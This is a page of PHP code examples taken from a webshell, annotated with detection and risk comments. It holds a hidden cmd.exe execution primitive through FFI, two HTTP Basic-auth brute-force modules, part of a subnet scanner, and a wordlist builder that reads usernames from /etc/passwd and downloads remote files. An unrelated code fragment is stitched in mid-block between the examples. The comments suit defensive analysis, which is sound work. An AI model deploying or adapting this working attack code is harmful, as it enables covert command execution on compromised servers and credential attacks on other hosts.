Esempio n. 1
/**
 * Webshell command-execution primitive for Windows hosts (FFI path).
 *
 * Runs $command through `cmd.exe /c`, redirects its stdout to a temporary
 * file and returns that file's contents. $command is interpolated verbatim,
 * so whatever the caller supplies is executed unchanged.
 *
 * Detection notes (all visible in this function):
 *  - a kernel32!WinExec call issued from the PHP worker via the FFI extension;
 *  - a short-lived file in the temp directory named "NJ" + uniqid() output;
 *  - a cmd.exe process spawned by the web-server worker with SW flag 0 (hidden).
 * Mitigation: the path is unavailable when the FFI extension is not loaded or
 * ffi.enable forbids user-land FFI.
 *
 * @param string $command  shell command to run; not validated or escaped
 * @return string          captured stdout of the command
 */
function ffishelL($command)
{
    // whereistmP() is defined elsewhere; presumably the temp directory — verify.
    $name = whereistmP() . "\\" . uniqid('NJ');
    // Bind WinExec straight out of kernel32.dll through FFI.
    $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
    // Second argument 0 is SW_HIDE: no console window. Return value is never checked.
    $res = $api->WinExec("cmd.exe /c {$command} >\"{$name}\"", 0);
    // Polls until the redirected output file appears; there is no timeout.
    while (!file_exists($name)) {
        sleep(1);
    }
    // Read the captured output, then remove the artifact file.
    $exec = file_get_contents($name);
    unlink($name);
    return $exec;
}
/**
 * HTTP Basic-auth dictionary attack module of the webshell (variant 1).
 *
 * Driven entirely by $_REQUEST. With `target` and `dictionary` set it reads
 * one candidate per line from the dictionary file, sends one HTTP/1.0 request
 * per candidate to port 80 of the target host carrying an
 * `Authorization: Basic` header, and prints (optionally appends to a log
 * file) every candidate whose response status begins with "20". Without those
 * parameters it prints the HTML form.
 *
 * Risk notes for the hosting server (all visible below):
 *  - `dictionary` is an unvalidated path handed straight to fopen();
 *  - `logfilE` is an unvalidated path that file_add_contentS() appends to;
 *  - each dictionary line opens a fresh outbound TCP connection, so the host
 *    becomes a source of high-rate authentication failures on the target.
 *
 * Network fingerprint of the generated requests: HTTP/1.0, the non-standard
 * `Accept-Encoding: text` header, a `Referer` equal to the bare host name,
 * `Connection: Close`, one connection per attempt.
 *
 * Relies on globals $errorbox, $et, $t, $hcwd and on the helpers spliturL()
 * and file_add_contentS(), all defined elsewhere in the shell (not in view).
 */
function authcrackeR()
{
    global $errorbox, $et, $t, $hcwd;
    if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
        // Optional hit log: destination path comes from the request, unvalidated.
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $data = '';
        // Truthy `method` selects POST, anything falsy selects GET.
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        // A query string on the target is split off: sent as body for POST,
        // re-appended to the path for GET (below).
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        // spliturL() (not in view) appears to fill $host and $page by reference — verify.
        spliturL($_REQUEST['target'], $host, $page);
        // combo=1: dictionary lines are "user:pass"; otherwise lines are passwords only.
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        if ($method == 'GET') {
            $page .= $data;
        }
        // Request-supplied path opened without any validation.
        $dictionary = fopen($_REQUEST['dictionary'], 'r');
        echo '<font color=blue>';
        while (!feof($dictionary)) {
            if ($type) {
                $combo = trim(fgets($dictionary), " \n\r");
                $user = substr($combo, 0, strpos($combo, ':'));
                $pass = substr($combo, strpos($combo, ':') + 1);
            } else {
                $pass = trim(fgets($dictionary), " \n\r");
            }
            // One new TCP connection per candidate; port 80 hard-coded, 5 s connect timeout.
            $so = fsockopen($host, 80, $en, $es, 5);
            if (!$so) {
                echo "{$errorbox} Can not connect to host{$et}";
                break;
            } else {
                // Hand-built HTTP/1.0 request; this header set is a usable signature.
                $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                if ($method == 'POST') {
                    $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
                }
                $packet .= "\r\n\r\n";
                $packet .= $data;
                fputs($so, $packet);
                // Only the first two status digits of the status line are examined.
                $res = substr(fgets($so), 9, 2);
                fclose($so);
                // Any 2xx status is reported as a valid credential.
                if ($res == '20') {
                    echo "U: {$user} P: {$pass}</br>";
                    if ($log) {
                        // Hit also appended to the request-supplied log path.
                        file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                    }
                }
            }
        }
        echo 'Done!</font>';
    } else {
        // HTML form; default log destination is "<tmp>/.log".
        echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>";
    }
}
Esempio n. 3
/**
 * HTTP Basic-auth dictionary / brute-force module of the webshell (variant 3).
 *
 * Same contract as the wordlist variant, plus a `mode` parameter: `wl` reads
 * candidates from the request-supplied `dictionary` file; any other value
 * builds a PHP source fragment with the target details interpolated and hands
 * it to brute() (not in view), which presumably evaluates it once per
 * generated candidate ($word) — verify against brute()'s definition.
 *
 * Risk notes for the hosting server (visible below):
 *  - `dictionary` and `logfilE` are unvalidated read/write paths;
 *  - request-controlled strings (host, page, user, data) are spliced unescaped
 *    into source text that is later evaluated and also echoed to the page;
 *  - one outbound TCP connection per candidate to port 80 of the target.
 *
 * Network fingerprint of the requests: HTTP/1.0, `Accept-Encoding: text`,
 * `Referer` equal to the bare host, `Connection: Close`, Basic credentials.
 *
 * Uses global $hcwd and the helpers whereistmP(), file_add_contentS() and
 * brute(), all defined elsewhere in the shell.
 */
function authcrackeR()
{
    global $hcwd;
    if (!empty($_REQUEST['target'])) {
        // Optional hit log at a request-supplied path.
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $data = '';
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        // Query string split off the target: POST body, or re-appended for GET.
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        // Host and path taken from the URL; no scheme/port handling, port 80 is fixed below.
        $u = parse_url($_REQUEST['target']);
        $host = $u['host'];
        $page = $u['path'];
        // combo=1: "user:pass" lines; otherwise password-only lines.
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        if ($method == 'GET') {
            $page .= $data;
        }
        echo '<font color=#FA0>';
        if ($_REQUEST['mode'] == 'wl') {
            // Wordlist mode: request-supplied path opened without validation.
            $dictionary = fopen($_REQUEST['dictionary'], 'r');
            while (!feof($dictionary)) {
                if ($type) {
                    $combo = trim(fgets($dictionary), " \n\r");
                    $user = substr($combo, 0, strpos($combo, ':'));
                    $pass = substr($combo, strpos($combo, ':') + 1);
                } else {
                    $pass = trim(fgets($dictionary), " \n\r");
                }
                // New connection per candidate; connect errors are suppressed with @.
                $so = @fsockopen($host, 80, $en, $es, 5);
                if (!$so) {
                    echo "Can not connect to host";
                    break;
                } else {
                    // Hand-built HTTP/1.0 request; header set doubles as a signature.
                    $packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                    if ($method == 'POST') {
                        $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
                    }
                    $packet .= "\r\n\r\n";
                    $packet .= $data;
                    fputs($so, $packet);
                    // Only the two status digits of the status line are read.
                    $res = substr(fgets($so), 9, 2);
                    fclose($so);
                    // Any 2xx status counts as a hit.
                    if ($res == '20') {
                        echo "U: {$user} P: {$pass}</br>";
                        if ($log) {
                            file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                        }
                    }
                }
            }
        } else {
            // Brute-force mode: assemble PHP source text with $host, $method, $page,
            // $user and $data interpolated. $word is left as a free variable for
            // brute() to bind per candidate; $test is the per-candidate result.
            $code = '
			$so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 );
			$packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic "
			. base64_encode ( "' . $user . ':".$word )."\\r\\n"';
            if ($method == "POST") {
                $code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'";
            }
            $code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet );	$test= ( substr ( fgets ( $so ), 9, 2 ) == "20");';
            // The generated source is echoed to the response before being used.
            echo $code;
            // brute() (not in view) receives the charset selector, length bounds and the code.
            if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) {
                echo "<b>{$user}:{$res}</b><br />";
            }
        }
        echo 'Done!</font>';
    } else {
        // HTML form. Default target is the hosting server's own HTTP_HOST at /admin/;
        // default log destination is "<tmp>/.log".
        echo '
<form name=cracker method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">HTTP Auth cracker</label>
</div><div class="fieldwrapper">
<label class="styled">Target:</label>
<div class="thefield">
<input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" />
</div>
</div>
<div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield">
<select name="mode" id="mode" onChange="toggle()">
<option value="09">Bruteforce [0-9]</option>
<option value="az">Bruteforce [a-z]</option>
<option value="az09">Bruteforce [a-z] [0-9]</option>
<option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option>
<option value="all">Bruteforce [ALL]</option>
<option value="wl">Wordlist</option>
</select>
</div></div>
<div class="fieldwrapper" id="dic">
<label class="styled">Dictionary:</label>
<div class="thefield">
<input type="text" name="dictionary" size="30" />
</div>
</div><div class="fieldwrapper" id="fcr">
<label class="styled">Dictionary type:</label>
<div class="thefield">
<ul style="margin-top:0;">
<li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li>
<li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li>
</ul>
</div>
</div>
<div class="fieldwrapper">
<label class="styled">Method:</label>
<div class="thefield">
<select name="method"><option selected value="1">POST</option><option value="0">GET</option></select>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label>
<div class="thefield">
<input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log">
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="start" value="Start" style="margin-left: 150px;" />
</div>
</form><script>toggle();</script>';
    }
}
         flusheR();
     }
     $time = time() - $start;
     echo "Done! ({$time} seconds)</font>";
 } elseif (!empty($_REQUEST['securityscanner'])) {
     echo "<font color=yellow>";
     $start = time();
     $from = $_REQUEST['from'];
     $to = (int) $_REQUEST['to'];
     $timeout = (int) $_REQUEST['timeout'];
     $f = substr($from, strrpos($from, ".") + 1);
     $from = substr($from, 0, strrpos($from, "."));
     if (!empty($_REQUEST['httpscanner'])) {
         echo "Loading webserver bug list...";
         flusheR();
         $buglist = whereistmP() . DIRECTORY_SEPARATOR . namE();
         $dl = @downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
         if ($dl) {
             $file = file($buglist);
             echo "Done! scanning started.<br><br>";
         } else {
             echo "Failed!!! scanning started without webserver security testing...<br><br>";
         }
         flusheR();
     } else {
         $fr = htmlspecialchars($from);
         echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
     }
     for ($i = $f; $i <= $to; $i++) {
         $output = 0;
         $ip = "{$from}.{$i}";
Esempio n. 5
/**
 * Wordlist builder module of the webshell. Three modes, chosen by which
 * $_REQUEST parameters are present:
 *  1. `range` + `min` + `max` + `output`: generate every string of length
 *     min..max over one character class and append it to `output`;
 *  2. `input` + `output`: copy the text before the first ':' of each line of
 *     `input` (the form defaults to /etc/passwd) into `output`;
 *  3. `url` + `output`: download `url` into `output` via downloadiT().
 * `combo=1` writes each entry as "word:word" in all modes. With none of the
 * parameter sets present the HTML forms are printed.
 *
 * Risk notes for the hosting server (visible below):
 *  - `output` is an unvalidated path opened for append/write (arbitrary file write);
 *  - `input` is an unvalidated read path; on non-Windows hosts a failed open
 *    falls back to shelL("cat ...") — a shell-execution path;
 *  - `url` mode writes arbitrary remote content to the local filesystem.
 *
 * Relies on globals $errorbox, $windows, $footer, $t, $et, $hcwd and on the
 * helpers shelL(), downloadiT() and whereistmP(), all defined elsewhere.
 */
function dicmakeR()
{
    global $errorbox, $windows, $footer, $t, $et, $hcwd;
    // combo=1 → entries written as "word:word".
    if (!empty($_REQUEST['combo']) && $_REQUEST['combo'] == 1) {
        $combo = 1;
    } else {
        $combo = 0;
    }
    // Mode 1: sequential generation.
    if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])) {
        $min = $_REQUEST['min'];
        $max = $_REQUEST['max'];
        if ($max < $min) {
            die($errorbox . "Bad input!{$et}" . $footer);
        }
        $s = $w = "";
        $out = $_REQUEST['output'];
        // Range marker: 'a' → lower-case, anything else → upper-case, unless the
        // loose `== 0` comparison below matches. NOTE(review): on PHP < 8 a
        // non-numeric string also compares equal to 0, so the selected class
        // depends on the PHP version.
        $r = $_REQUEST['range'] == 'a' ? 'a' : 'A';
        if ($_REQUEST['range'] == 0) {
            $r = 0;
        }
        // Seed: $min copies of the marker character.
        for ($i = 0; $i < $min; $i++) {
            $s .= $r;
        }
        // Request-supplied path opened for append without validation.
        $dic = fopen($out, 'a');
        // Branch chosen by is_nan() on the marker; $r is a string or 0 here, so the
        // outcome follows the PHP version's coercion rules for is_nan() — verify.
        if (is_nan($r)) {
            // Letters: PHP string increment ($s++ walks 'a'..'z', 'aa', ...).
            while (strlen($s) <= $max) {
                $w = $s;
                if ($combo) {
                    $w = "{$w}:{$w}";
                }
                fwrite($dic, $w . "\n");
                $s++;
            }
        } else {
            // Digits: numeric increment, zero-padded to $min.
            while (strlen($w) <= $max) {
                $w = (string) str_repeat("0", $min - strlen($s)) . $s;
                if ($combo) {
                    $w = "{$w}:{$w}";
                }
                fwrite($dic, $w . "\n");
                $s++;
            }
        }
        fclose($dic);
        echo "<font color=blue>Done</font>";
    }
    // Mode 2: harvest user names from a passwd-style file.
    if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])) {
        // Request-supplied read path, unvalidated.
        $input = fopen($_REQUEST['input'], 'r');
        if (!$input) {
            if ($windows) {
                echo $errorbox . "Unable to read from " . htmlspecialchars($_REQUEST['input']) . "{$et}<br>";
            } else {
                // Non-Windows fallback goes through the shell helper.
                $input = explode("\n", shelL("cat {$input}"));
                $output = fopen($_REQUEST['output'], 'w');
                if ($output) {
                    foreach ($input as $in) {
                        $user = $in;
                        $user = trim(fgets($in), " \n\r");
                        if (!strstr($user, ":")) {
                            continue;
                        }
                        $user = substr($user, 0, strpos($user, ':'));
                        if ($combo) {
                            fwrite($output, $user . ":" . $user . "\n");
                        } else {
                            fwrite($output, $user . "\n");
                        }
                    }
                    fclose($input);
                    fclose($output);
                    echo "<font color=blue>Done</font>";
                }
            }
        } else {
            // Request-supplied write path, unvalidated.
            $output = fopen($_REQUEST['output'], 'w');
            if ($output) {
                while (!feof($input)) {
                    $user = trim(fgets($input), " \n\r");
                    // Only lines containing ':' are kept; text before it is the user name.
                    if (!strstr($user, ":")) {
                        continue;
                    }
                    $user = substr($user, 0, strpos($user, ':'));
                    if ($combo) {
                        fwrite($output, $user . ":" . $user . "\n");
                    } else {
                        fwrite($output, $user . "\n");
                    }
                }
                fclose($input);
                fclose($output);
                echo "<font color=blue>Done</font>";
            } else {
                echo $errorbox . " Unable to write data to " . htmlspecialchars($_REQUEST['input']) . "{$et}<br>";
            }
        }
    // Mode 3: fetch a remote file onto the server via downloadiT() (not in view).
    } elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])) {
        $res = downloadiT($_REQUEST['url'], $_REQUEST['output']);
        if ($combo && $res) {
            // Rewrite the downloaded file in "line:line" form.
            $file = file($_REQUEST['output']);
            $output = fopen($_REQUEST['output'], 'w');
            foreach ($file as $v) {
                fwrite($output, "{$v}:{$v}\n");
            }
            fclose($output);
        }
        echo "<font color=blue>Done</font>";
    } else {
        // HTML forms. Defaults: output "<tmp>/.dic", input /etc/passwd, and an
        // external wordlist URL for the download form.
        $temp = whereistmP();
        echo "<center>{$t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Make></td></tr></form></table><br>{$t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input 
type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Grab></td></tr></form></table><br>{$t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Get></td></tr></form></table></center>";
    }
}